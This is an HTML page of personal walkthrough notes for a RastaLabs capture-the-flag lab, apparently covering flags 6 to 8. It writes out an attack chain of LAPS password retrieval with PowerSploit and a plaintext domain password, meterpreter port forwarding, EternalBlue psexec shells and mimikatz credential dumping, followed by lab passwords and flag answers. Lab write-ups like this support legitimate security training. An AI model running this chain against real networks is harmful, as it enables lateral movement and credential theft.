<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>6&amp;7&amp;8 flag</title>
</head><body>on enumeration found, ngodfrey_adm is part of laps group<br/>
and also found laps is installed on ws05,<br/>
<br/>
to find the local accounts passwords,<br/>
<br/>
upload the powersploit script <br/>
<br/>
powershell -ep bypass<br/>
Import-module ./PowerSploit.psd1<br/>
$SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force<br/>
$cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\ngodfrey_adm', $SecPassword)<br/>
<br/>
(Get-Command cmdlet ).parameters - to view all arguments a cmdlet can take<br/>
<br/>
Get-ADObject -Name web01 &nbsp;-DomainController 10.10.120.1 -Credential $Cred<br/>
<br/>
<br/>
References <br/>
<br/>
http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ &nbsp; &nbsp; ------- from powerview to powersploit comparison<br/>
https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainObject/ &nbsp; &nbsp; -------- &nbsp;complete powersploit<br/>
https://github.com/HarmJ0y/CheatSheets &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; --------- &nbsp;cheatsheets <br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
<br/>
local admin passwords,<br/>
<br/>
ws01 - 4687ws7xu0M5N0ZX80Nk2bm9UQ300wS87xnEp9BGy8FJ0pUh [ account disabled ]<br/>
ws02 - FOFRI7M3W8Ul6d374M4AYRTU6tS512ZY6v22Ua57l12qYIe1<br/>
ws03 - zoY05167d425Xi1Xzk9mjdWa2e9v9N18pYyy84mSXx9XGQLu<br/>
WS04 - 8S4BVKf5fP6b97KYB1r73BYQwf1V1WV0iObaP69FvDb2KXeX<br/>
WS05 - O9suMqfk5D6mV2Y2GH5753xL9g9T93yEpapIINj1DU88M2fC &nbsp; [ account disabled ]<br/>
<br/>
using any metrepreter sessions, enable port forwarding<br/>
<br/>
meterpreter &gt; portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445<br/>
[*] Local TCP relay created: 10.10.14.83:447 &lt;-&gt; 10.10.121.101:445<br/>
meterpreter &gt; portfwd add -L 10.10.14.83 -r 10.10.123.100 -l 448 -p 445<br/>
[*] Local TCP relay created: 10.10.14.83:448 &lt;-&gt; 10.10.123.100:445<br/>
<br/>
using the module, found the local admin accounts of WS01 and WS05 are disabled<br/>
exploit/windows/smb/ms17_010_psexec<br/>
<br/>
<img src="screenshot 3.png" /><br/>
<br/>
<br/>
use the psexec module to get admin shell on ws04, ws02 (flag is there) , ws03<br/>
use lport 80, 443, 8080<br/>
<br/>
<img src="screenshot 2.png" /><br/>
<br/>
<br/>
got the flag on ws02,<br/>
<br/>
<img src="screenshot 4.png" /><br/>
<br/>
<br/>
RASTA{3v3ryb0dy_l0v35_l4p5}<br/>
<br/>
In ws02, with local admin rights run mimikatz,<br/>
<br/>
upload mimikatz.exe ,<br/>
<br/>
privilege::debug<br/>
sekurlsa::logonPasswords<br/>
<br/>
<img src="screenshot 5.png" /><br/>
<br/>
<br/>
RASTA{wh3r3_w45_2f4_!?}<br/>
<br/>
<br/>
got the flag on ws04,<br/>
<br/>
icacls flag.txt /grant administrator:F (or) icacls flag.txt /grant RLAB\ahope:F<br/>
<br/>
RASTA{50m371m35_y0u_mu57_b4ck7r4ck}<br/>
<br/>
</body></html>